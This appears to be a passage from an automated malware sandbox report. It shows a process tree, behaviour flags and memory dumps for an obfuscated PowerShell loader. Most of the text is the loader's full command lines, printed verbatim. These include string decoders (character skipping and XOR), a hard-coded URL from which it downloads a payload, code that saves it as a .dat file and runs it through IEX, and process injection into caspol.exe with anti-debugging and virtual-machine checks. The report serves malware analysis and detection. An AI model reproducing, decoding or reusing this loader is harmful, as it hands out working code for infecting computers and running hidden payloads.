Re'Ba3ArDSp5Ri0Hu7Wi7Ou6SkFSa7ba8Tr7Ce5Ta7Hu0Da2HoAHy3Kn9po2Kr4Gy3Ka9Fl3JuDUn5OvDOd7HoCTo6ThASq7Kl6De6WhBOb7Op0Cy3se7Id5Ve0Lu7Ma7ch6OpFSy7La6Su7An2Fl7PuCIn3St1In4Bl2Ab5Am0An7An7Po6BlDDo4Ri9Su6SkDCo6GuBVa4An4Pa2Bi3Ve2Ma3Br4Cr3Co7AlCCa6AcBSu7Ha6Sk3Gl5Es3Bo9Fe2FiFAl2BrFro2Ry9Na3St5Ev3Gl9Re2La9Ra6Hi1Ba2OyASw2De9Pa2Sa9De2Ma9Ln3En5G 3Ec9Ov2Jo9Mo6Be1Mi2MeDUn2Co9Ty3Fo0Fo'sl;St&En(Fr`$EnSArkFieAvlBevstyAr7He)Ru Qu`$HeSFluFopcoeNurNoiKo7re;Pe`$CoSOuuDepAfeAfrFiiSc8Co Ad=De AcHAnTGrBMi Mi'In3SiDbo5Up2Gt7fo6Es7Vi4Op7Ey4Do3Sc9Au2In4Af3To9Sm3GaDDi5FoDMa7SyCTu6maAde7fo6De6TeBHi7Ci0Ka3Ga7Ow5De0Wr7Is7Kr6BlFTa7st6Pa7Tu2Ko7BiCCo3Sp1Dy4Mo2Ho5De0Re7et7Ko6UnDDo4Si9in6LaDFl6ExBPe4Co4Fr2At3Ab2Me3un4Un3Pr7BaCMo6ReBGe7No6Ar3Hj5Ob3Br9Au2SaAPr2Pi1Ud2Ja1Of2Fe9Wi2FoCUn2AnCFj2Tn9La2LeDic3Op5Or3St9So2Pr9Ve6go1Su2ovATa2Br9Af2Ho9No2Bl9Fd3Le5To3th9Af2In9Fl6Ar1Mu2NoDRe3Ef0Ut'Fi;Bk&Ov(Sk`$HySNokCoeFalPrvMeyCo7Ni)Fa Pi`$KaSfluInpGeeTerFiiKl8Bl;Sa`$ArKRuoBiiTicHy0St1To Ha=Pa As'MohLotDitEgpSmsSl:in/Er/IsmBoeAlgBeoMaocokPabSapSynWhqDo.AzcVofSo/UnhWieMarKlppaeRetGriKlcViiBi.PlaAsfFomNo'Ke;Am`$CoKMyoweiPrcGr0ko0Gs Ak=Fa AdHstTGoBNo Il'Ar3CeDIm5KuFRa7kr6Go6RaBRe7Sa1Wa7al8Bo7Be7Li3Sy9Ce2Re4Te3Pr9Tr3Sk1Hu5ba7Kb7UfCBu6SkEUn3De4Mo5Re6Ge7SaBUn7Sa3Tm7ArCTh7SaAVa6JgDBi3Sc9Cr5Un7Ch7RuCpa6UrDCi3Pu7Fo4SkEin7PeCOp7TuBBe5UnAOr7Ba5Dr7Di0Mi7AmCPe7fl7Fi6FlDOb3Ri0Ka3Ha7Be5BiDKa7Wi6Ca6FrESo7Re7Na7Ef5Tu7Fo6Ap7De8Ef7AsDLu4DjAUn6LyDNo6HjBDo7Af0An7Ok7Ne7IsEFe3Li1Sk3UnDUr5Su2Re7Pe6Gr7Le0Am7WeAtr2Un9Bo2Zi8Un3sv0un'Af;Be`$VaSSkuLsptoePrrFriMi8Wa cu=Al HnHHaTOpBSp Aw'Se3AlDas5My0Af7Mi7In6BoFNe7Pn8Ly7Co5No7Lu0Em2MuBne2St4Re3UnDAr7PlCIs7Sk7Tw6BlFSc2Fo3Pr7Sp8un6ox9Fr6Pl9Te7AsDAh7Ne8Ov6NoDDe7Wh8As'Ud;Bi&Si(We`$MaSGrkuheUnlExvBiyBl7ha)Le Su`$ReSMouHopReeInrMuiAf8Bs;Ca`$obIHunSvvHoaPllSuiMe2Ma=He`$klIDrnUnvViaJilSkiAs2No+Ar'Fo\GuTGlrarbTvaFlaHe.KrdreaSttHy'Am;Ph`$OcFhioMirPohTeaHenFo=Hy'Ja'Me;PoiDefPe Mo(Up-JunEvoArtSm(BeTIneSisSatSc-BrPBraKotHahBe Bo`$ArIVenzovShaSalOniKy2Co)Un)Re An{CowCahHaiArlBaeDi Ud(to`$PoFSqostrFohEcaTunHo Je-NueReqMe Ud'Sa'Co)po Me{Py&Vo(Ky`$moSVekPoeEnlKovAfyNo7Es)Sa Pa`$FlKCooCoimacKa0Sk0Fi;DeSBrtQuansrDetAn-BaSAllPeeUneVipSa Te5ov;Ya}ScSVveRetAl-ScCFooDenFitBaeJenGotMa Tv`$PeIGrnAtvTaaAllEgiFo2fo Di`$ReFInoClrKehEmaSknIn;Me}re`$opFSeoAfrBrhPlaGinTr Fl=Tr FuGakeIdtUn-CoCDooPonvatTueConOvtAf Oc`$PhISlnDevReaRelSviPa2Ch;An`$fySMauLopPreSurKaiHa9Fd Ha=Mi noHMoTReBAg Ko'Sw3InDVe4GaAKo6AkCFu6An9Re7RaCJa6syBRe7Af0Un3Or9Ke2An4Be3jo9Da4jo2Ud4BaAFl6Po0Rn6PrASy6CrDMi7FoCTw7Pi4In3Ne7Fi5YuALo7Sc6Sy7Pl7Tr6SkFWo7MiCAn6RaBSd6UdDLi4Fo4Fo2Ka3St2Th3Ro5VeFsk6SmBDa7Er6Bu7Fi4Pr5StBHa7Sa8fj6DeASk7inCAf2SmFLe2KeDSt4MaAlo6OpDBu6GiBKi7Sv0fi7sl7He7PaEHe3Kn1Ps3PeDKo5DiFPo7Ud6Te6LiBlu7Bj1Un7So8La7fo7Du3Bo0Sq'To;La&Qu(Su`$MiSCokVrebrlinvGryBr7Ce)Kl Aa`$LiSKauBipUneBerImiUn9Dn;ug`$UdFDeoVirPrhFeaMdnMe0He Dr=Re CoHMnTKkBDe Te'Un4Te2Ga4CoAOv6Mu0Do6TeAAl6NoDUn7ReCAr7St4un3In7Ra4EuBCh6OpCRu7ca7In6waDSl7Gr0Sh7Re4Ef7MeCSu3Bl7Ll5Ko0Sc7Br7Pa6UnDBo7UnCKa6TrBBa7Pe6Be6St9St4SpASy7LaCTi6BaBDe6FrFHa7hy0co7EnASy7SpCAu6SeAZo3Mo7An5Py4Fo7Un8Hy6UnBBa6CaALo7Ve1Yi7He8Bo7he5Se4pu4Gr2To3Be2De3kr5DiAFr7Va6Co6Th9St6Ra0Di3Rd1Ga3DiDIn4AfALn6kuCGe6Fo9Hy7TrCOp6klBRe7By0Ho3No5Ba3Ud9Di2Un9Re3Re5In3Ra9St3Hi9Le3InDDr5Hi0Fo7Pa7Hj6GaFPr7Ku8Ud7Ab5Cu7Le0Pl2VoAPr3Fo5Lo3De9Om2saFEm2CeFRu2Fo9Gu3In0Re'Ou;Ru&Pa(Da`$HySOmkSueTalUdvSpyTe7Sa)Vi Di`$BrFEloNerAghWaaTonNo0Ti;In`$PaTlaeVaxuntFiuCoaRelFiiFl=La`$MeSPiuTepuneKirFoiNy.FocenoMeuFunJatAn-Pi6Pe6Kd0Te;Pl`$PoFunoGerUnhOuaYenIn1Rk Sv=Me VaHapTCoBby St'De4So2Or4ReABr6Sa0Vi6FoAEm6PlDHj7StCdi7Re4Bl3Ca7Pa4UnBMi6DeCNe7Wi7No6UnDGn7In0Ma7Si4Gr7RdCGe3fr7Sa5ke0So7Mo7Gl6DoDFo7KaCEl6CiBIo7Do6No6Fj9Ca4PeATo7AmCHe6FlBte6VeFGe7Co0Me7JuAco7DiCNo6ViAPh3Or7Fa5Be4An7Mi8Sk6ThBBi6ChAur7Ti1Me7Ga8Fa7Su5Vi4Sp4Dr2De3Sl2An3Mi5FrAOv7Ac6Up6Ca9ra6Te0ud3An1Sk3MoDHe4AcAPo6FiCFa6St9Ro7noCEr6UdBhi7Pa0Dc3in5Ju3Sk9Fl2ReFUn2UnFly2su9Se3Fi5Pa3Su9Sk3ReDRe5Gi2Mo7Ki6Da7Ge4No7Au4Ve3As5Op3hj9Re3JeDHa4LeDBi7BaCFl6Co1Tr6AkDSm6SlCAf7Me8Sp7En5Pr7Pe0Po3Ve0Re'Ph;Ov&fr(Dy`$OvSLokHoeUflinvceyRn7To)Bi Ko`$PrFWioForPrhIsaSpnSw1ga;Sk`$ChFunoInrInhPraBrnGa2Gl Ra=Pe HyHFoTFeBLa Vo'in3GrDEq7BiFHa7Ar6Fu6PhBSa7VeBSi3Ma9to2Pa4Me3Ef9Ke4Ud2Ma4elAKr6Al0Br6LyAAk6PoDVi7OpCCo7Ba4Ti3My7Ke4UnBMa6ReCNo7co7Po6LaDFo7Sp0Un7Ru4In7BaCRe3Va7Xe5To0Ko7Sn7Mi6JaDFr7DeCMa6ImBHe7Ge6Se6Bu9An4CeASp7PlCPi6NeBTa6GaFCy7Es0Mo7FlAPr7LiCCu6TrASn3Co7Ov5Me4Sv7Ca8Cy6MiBSt6HeAPa7In1Ca7Aa8Ne7Vi5No4Rg4Fo2Jo3Ma2Av3br5MaEEk7AdCDe6QuDSt5PaDSt7saCGu7Ta5Sn7SuCCo7SiEBi7An8Bi6CiDFu7VaCUa5AlFPo7no6Ef6MaBun5DrFCy6BlCUn7To7Ch7InASt6SaDka7Ba0Ho7Ko6Ap7In7Je4Fo9Sk7st6Ma7An0bo7To7Vr6DyDCr7CrCPi6PrBch3Su1St3fr1Ig7AnFSu7Kl2Bl6Sk9Ek3Sn9Ra3duDLy4FiAUn7Je8St7Di4sw7un5Ta7SoCCh3St9Ge3KiDOv4NyDMe7Tr8Ur7Un5No7LeCBo3ve0Bl3Ir5Ku3Va9Ca3Pi1Su5OkEOp5FiDKo4ArDUn3Ra9Ko5Br9Ge3Ma1Fo4St2Sk5Es0At7Dy7Wo6FoDJu4Ge9Sy6DiDSc6TaBRe4Fo4Fr3Ad5At3Ur9Tr4Hi2Un5Su0Sm7Di7Ni6FeDDi4No9Tr6DeDNo6SoBPa4Ud4fe3Di5br3Be9Sa4Ku2Mi5Di0Un7Ti7Re6FeDBu4Le9Gr6MaDTo6DoBSh4Fi4Ke3Go5si3Gr9Ve4ov2In5no0Di7Pa7Hu6IpDby4Ho9De6CrDUn6DyBHa4Ud4Ba3Br5St3Cl9co4Bo2Br5ba0Ma7An7Ac6PaDMa4Ba9Eu6AmDGr6MaBmi4At4Va3Sp0Ub3Pe9No3Ac1Be4Dr2Br5Bs0Ga7Da7St6PhDOv4Kn9Pi6BaDIn6PeBOc4Ou4Pi3Ur0Il3Gl0St3St0Tr'Av;Re&Fo(Co`$SySCokMieNylOpvViyBe7Mi)Ba ky`$trFSvoLarHahDaaHynBe2ra;Ti`$AdFFloHvrsphReaTrnFo3Fo Tm=Kr UnHDeTRaBMo Po'Af3AlDUl7DeFRa7Hy6En6KuBGy7ErBEm3Ve7Dr5Af0Ar7be7Kl6GuFAl7Hu6Li7Ig2Ch7MuCRd3Pr1Le3fiDsl5Wr0Re7Fg7Bd6baFFo7En8Ne7Ve5Ka7Yo0La2SjABr3Su5Te3PaDFl5Ca2Op7Su6Tr7La4Si7An4sa3Al5Sk3MrDUp5Fd8St6GrBIn7SuBHe7In8Kr7Wa5Ha3Fo5Va2Pr9Pr3Do5Th2Gi9Er3fo0My'Mt;Am&Te(Ja`$HyScokNoevilSovMeyRi7Sk)St Pe`$StFAfoRerKlhPraEtnCo3Sp#Ra;""";Function Forhan9 { param([String]$Amoralite); For($Valsa=2; $Valsa -lt $Amoralite.Length-1; $Valsa+=(2+1)){$Koic = $Koic + $Amoralite.Substring($Valsa, 1)}; $Koic;}$Talomr0 = Forhan9 'MiITaESpXPe ';$Talomr1= Forhan9 $Chester;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Talomr1 ;}else{&$Talomr0 $Talomr1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Amoralite); $Corsos = ''; Write-Host $Corsos; Write-Host $Corsos; Write-Host $Corsos; $smedemestr = New-Object byte[] ($Amoralite.Length / 2); For($Valsa=0; $Valsa -lt $Amoralite.Length; $Valsa+=2){ $smedemestr[$Valsa/2] = [convert]::ToByte($Amoralite.Substring($Valsa, 2), 16); $smedemestr[$Valsa/2] = ($smedemestr[$Valsa/2] -bxor 25); } [String][System.Text.Encoding]::ASCII.GetString($smedemestr);}$Udsalgsvar0=HTB '4A606A6D7C74377D7575';$Udsalgsvar1=HTB '54707A6B766A767F6D374E70772A2B374C776A787F7C57786D706F7C547C6D71767D6A';$Udsalgsvar2=HTB '5E7C6D496B767A587D7D6B7C6A6A';$Udsalgsvar3=HTB '4A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A375178777D757C4B7C7F';$Udsalgsvar4=HTB '6A6D6B70777E';$Udsalgsvar5=HTB '5E7C6D54767D6C757C5178777D757C';$Udsalgsvar6=HTB '4B4D4A697C7A7078755778747C353951707D7C5B604A707E3539496C7B75707A';$Udsalgsvar7=HTB '4B6C776D70747C3539547877787E7C7D';$Udsalgsvar8=HTB '4B7C7F757C7A6D7C7D5D7C757C7E786D7C';$Udsalgsvar9=HTB '5077547C74766B6054767D6C757C';$Skelvy0=HTB '54605D7C757C7E786D7C4D60697C';$Skelvy1=HTB '5A75786A6A3539496C7B75707A35394A7C78757C7D353958776A705A75786A6A3539586C6D765A75786A6A';$Skelvy2=HTB '50776F76727C';$Skelvy3=HTB '496C7B75707A353951707D7C5B604A707E3539577C6E4A75766D35394F706B6D6C7875';$Skelvy4=HTB '4F706B6D6C7875587575767A';$Skelvy5=HTB '776D7D7575';$Skelvy6=HTB '576D496B766D7C7A6D4F706B6D6C7875547C74766B60';$Skelvy7=HTB '505C41';$Skelvy8=HTB '45';$Samle=HTB '4C4A5C4B2A2B';$Tale=HTB '5A7875754E70777D766E496B767A58';function fkp {Param ($dugpunk, $Totingkata) ;$Superi0 =HTB '3D4A697D7C72787539243931425869695D76747870774423235A6C6B6B7C776D5D7674787077375E7C6D586A6A7C747B75707C6A31303965394E717C6B7C34567B737C7A6D3962393D46375E75767B7875586A6A7C747B75605A787A717C393458777D393D463755767A786D707677374A6975706D313D4A727C756F60213042342844375C686C78756A313D4C7D6A78757E6A6F786B2930396430375E7C6D4D60697C313D4C7D6A78757E6A6F786B2830';&($Skelvy7) $Superi0;$Superi5 = HTB '3D4D7C6B6D7078776A3924393D4A697D7C727875375E7C6D547C6D71767D313D4C7D6A78757E6A6F786B2B3539424D60697C4244443959313D4C7D6A78757E6A6F786B2A35393D4C7D6A78757E6A6F786B2D3030';&($Skelvy7) $Superi5;$Superi1 = HTB '6B7C6D6C6B77393D4D7C6B6D7078776A3750776F76727C313D776C757535395931424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A375178777D757C4B7C7F4431577C6E34567B737C7A6D394A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A375178777D757C4B7C7F3131577C6E34567B737C7A6D3950776D496D6B303539313D4A697D7C727875375E7C6D547C6D71767D313D4C7D6A78757E6A6F786B2C30303750776F76727C313D776C7575353959313D7D6C7E696C77723030303035393D4D766D70777E72786D783030';&($Skelvy7) $Superi1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Cosmonau,[Parameter(Position = 1)] [Type] $Chuckl = [Void]);$Superi2 = HTB '3D70777F75766E7B75766E392439425869695D76747870774423235A6C6B6B7C776D5D7674787077375D7C7F70777C5D60777874707A586A6A7C747B75603131577C6E34567B737C7A6D394A606A6D7C74374B7C7F757C7A6D70767737586A6A7C747B75605778747C313D4C7D6A78757E6A6F786B2130303539424A606A6D7C74374B7C7F757C7A6D707677375C74706D37586A6A7C747B75605B6C70757D7C6B587A7A7C6A6A4423234B6C7730375D7C7F70777C5D60777874707A54767D6C757C313D4C7D6A78757E6A6F786B2035393D7F78756A7C30375D7C7F70777C4D60697C313D4A727C756F602935393D4A727C756F60283539424A606A6D7C7437546C756D707A786A6D5D7C757C7E786D7C4430';&($Skelvy7) $Superi2;$Superi3 = HTB '3D70777F75766E7B75766E375D7C7F70777C5A76776A6D6B6C7A6D766B313D4C7D6A78757E6A6F786B2F3539424A606A6D7C74374B7C7F757C7A6D707677375A78757570777E5A76776F7C776D7076776A4423234A6D78777D786B7D35393D5A766A747677786C30374A7C6D507469757C747C776D786D7076775F75787E6A313D4C7D6A78757E6A6F786B2E30';&($Skelvy7) $Superi3;$Superi4 = HTB '3D70777F75766E7B75766E375D7C7F70777C547C6D71767D313D4A727C756F602B35393D4A727C756F602A35393D5A716C7A727535393D5A766A747677786C30374A7C6D507469757C747C776D786D7076775F75787E6A313D4C7D6A78757E6A6F786B2E30';&($Skelvy7) $Superi4;$Superi5 = HTB '6B7C6D6C6B77393D70777F75766E7B75766E375A6B7C786D7C4D60697C3130';&($Skelvy7) $Superi5 ;}$Sulphur = HTB '727C6B777C752A2B';$Superi6 = HTB '3D5D7C6A766B70392439424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A3754786B6A7178754423235E7C6D5D7C757C7E786D7C5F766B5F6C777A6D707677497670776D7C6B31317F7269393D4A6C7569716C6B393D4A727C756F602D303539315E5D4D3959314250776D496D6B443539424C50776D2A2B443539424C50776D2A2B443539424C50776D2A2B443039314250776D496D6B44303030';&($Skelvy7) $Superi6;$Arbal = fkp $Skelvy5 $Skelvy6;$Superi7 = HTB '3D50776F7875702A3924393D5D7C6A766B703750776F76727C314250776D496D6B442323437C6B7635392F2F29353929612A292929353929612D2930';&($Skelvy7) $Superi7;$Superi8 = HTB '3D527674743924393D5D7C6A766B703750776F76727C314250776D496D6B442323437C6B7635392A2121292C2C292D353929612A292929353929612D30';&($Skelvy7) $Superi8;$Koic01 = 'https://megookbpnq.cf/herpetici.afm';$Koic00 = HTB '3D5F766B71787739243931577C6E34567B737C7A6D39577C6D374E7C7B5A75707C776D30375D766E777576787D4A6D6B70777E313D5276707A292830';$Superi8 = HTB '3D50776F7875702B243D7C776F237869697D786D78';&($Skelvy7) $Superi8;$Invali2=$Invali2+'\Trbaa.dat';$Forhan='';if (-not(Test-Path $Invali2)) {while ($Forhan -eq '') {&($Skelvy7) $Koic00;Start-Sleep 5;}Set-Content $Invali2 $Forhan;}$Forhan = Get-Content $Invali2;$Superi9 = HTB '3D4A6C697C6B70392439424A606A6D7C74375A76776F7C6B6D4423235F6B76745B786A7C2F2D4A6D6B70777E313D5F766B71787730';&($Skelvy7) $Superi9;$Forhan0 = HTB '424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A3754786B6A7178754423235A766960313D4A6C697C6B703539293539393D50776F7875702A35392F2F2930';&($Skelvy7) $Forhan0;$Textuali=$Superi.count-660;$Forhan1 = HTB '424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A3754786B6A7178754423235A766960313D4A6C697C6B7035392F2F2935393D5276747435393D4D7C616D6C78757030';&($Skelvy7) $Forhan1;$Forhan2 = HTB '3D7F766B7B392439424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A3754786B6A7178754423235E7C6D5D7C757C7E786D7C5F766B5F6C777A6D707677497670776D7C6B31317F7269393D4A7874757C393D4D78757C303539315E5D4D3959314250776D496D6B4435394250776D496D6B4435394250776D496D6B4435394250776D496D6B4435394250776D496D6B443039314250776D496D6B44303030';&($Skelvy7) $Forhan2;$Forhan3 = HTB '3D7F766B7B3750776F76727C313D50776F7875702A353D52767474353D586B7B78753529352930';&($Skelvy7) $Forhan3#"3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 25205⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1140 -ip 11401⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1140-163-0x0000000000D60000-0x0000000003262000-memory.dmpFilesize
37.0MB
-
memory/1140-156-0x0000000000D60000-0x0000000003262000-memory.dmpFilesize
37.0MB
-
memory/1140-169-0x0000000022CD0000-0x0000000022D62000-memory.dmpFilesize
584KB
-
memory/1140-157-0x00007FF832C10000-0x00007FF832E05000-memory.dmpFilesize
2.0MB
-
memory/1140-159-0x00000000776E0000-0x0000000077883000-memory.dmpFilesize
1.6MB
-
memory/1140-172-0x00000000776E0000-0x0000000077883000-memory.dmpFilesize
1.6MB
-
memory/1140-171-0x00007FF832C10000-0x00007FF832E05000-memory.dmpFilesize
2.0MB
-
memory/1140-170-0x0000000022C50000-0x0000000022C5A000-memory.dmpFilesize
40KB
-
memory/1140-160-0x00000000776E0000-0x0000000077883000-memory.dmpFilesize
1.6MB
-
memory/1140-173-0x0000000000D60000-0x0000000003262000-memory.dmpFilesize
37.0MB
-
memory/1140-162-0x0000000000401000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/1140-165-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1140-154-0x0000000000000000-mapping.dmp
-
memory/1140-161-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/1988-134-0x0000000000000000-mapping.dmp
-
memory/1988-136-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmpFilesize
10.8MB
-
memory/1988-135-0x000001C79EC10000-0x000001C79EC32000-memory.dmpFilesize
136KB
-
memory/1988-149-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmpFilesize
10.8MB
-
memory/1988-168-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmpFilesize
10.8MB
-
memory/2752-142-0x0000000005A50000-0x0000000005AB6000-memory.dmpFilesize
408KB
-
memory/2752-144-0x0000000007B40000-0x00000000081BA000-memory.dmpFilesize
6.5MB
-
memory/2752-153-0x00000000776E0000-0x0000000077883000-memory.dmpFilesize
1.6MB
-
memory/2752-151-0x00007FF832C10000-0x00007FF832E05000-memory.dmpFilesize
2.0MB
-
memory/2752-155-0x00000000776E0000-0x0000000077883000-memory.dmpFilesize
1.6MB
-
memory/2752-150-0x00000000081C0000-0x000000000A6C2000-memory.dmpFilesize
37.0MB
-
memory/2752-148-0x000000000A6D0000-0x000000000AC74000-memory.dmpFilesize
5.6MB
-
memory/2752-158-0x00000000776E0000-0x0000000077883000-memory.dmpFilesize
1.6MB
-
memory/2752-147-0x0000000007400000-0x0000000007422000-memory.dmpFilesize
136KB
-
memory/2752-146-0x00000000074C0000-0x0000000007556000-memory.dmpFilesize
600KB
-
memory/2752-145-0x00000000072D0000-0x00000000072EA000-memory.dmpFilesize
104KB
-
memory/2752-152-0x00000000081C0000-0x000000000A6C2000-memory.dmpFilesize
37.0MB
-
memory/2752-143-0x00000000061E0000-0x00000000061FE000-memory.dmpFilesize
120KB
-
memory/2752-137-0x0000000000000000-mapping.dmp
-
memory/2752-166-0x00000000081C0000-0x000000000A6C2000-memory.dmpFilesize
37.0MB
-
memory/2752-167-0x00000000776E0000-0x0000000077883000-memory.dmpFilesize
1.6MB
-
memory/2752-141-0x0000000005330000-0x0000000005396000-memory.dmpFilesize
408KB
-
memory/2752-140-0x0000000005290000-0x00000000052B2000-memory.dmpFilesize
136KB
-
memory/2752-139-0x0000000005420000-0x0000000005A48000-memory.dmpFilesize
6.2MB
-
memory/2752-138-0x0000000002860000-0x0000000002896000-memory.dmpFilesize
216KB
-
memory/4132-133-0x0000000000000000-mapping.dmp
-
memory/4764-132-0x0000000000000000-mapping.dmp